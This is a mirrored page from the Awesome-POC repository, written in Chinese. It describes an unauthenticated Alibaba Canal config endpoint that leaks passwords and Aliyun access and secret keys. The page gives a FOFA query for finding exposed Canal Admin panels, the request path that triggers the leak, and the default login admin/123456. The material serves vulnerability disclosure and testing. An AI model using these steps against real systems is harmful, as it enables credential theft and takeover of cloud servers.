mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
41 lines
696 B
Markdown
41 lines
696 B
Markdown
|
|
# Alibaba Canal config 云密钥信息泄露漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
由于/api/v1/canal/config 未进行权限验证可直接访问,导致账户密码、accessKey、secretKey等一系列敏感信息泄露
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Alibaba Canal
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## FOFA
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
title="Canal Admin"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
验证漏洞的Url为
|
|||
|
|
|
|||
|
|
```plain
|
|||
|
|
/api/v1/canal/config/1/0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
其中泄露了 aliyun.access 密钥,可以控制密钥下的所有服务器
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
云密钥泄露参考: red.peiqi.tech
|
|||
|
|
|
|||
|
|
其中还含有默认口令 **admin/123456**
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|

|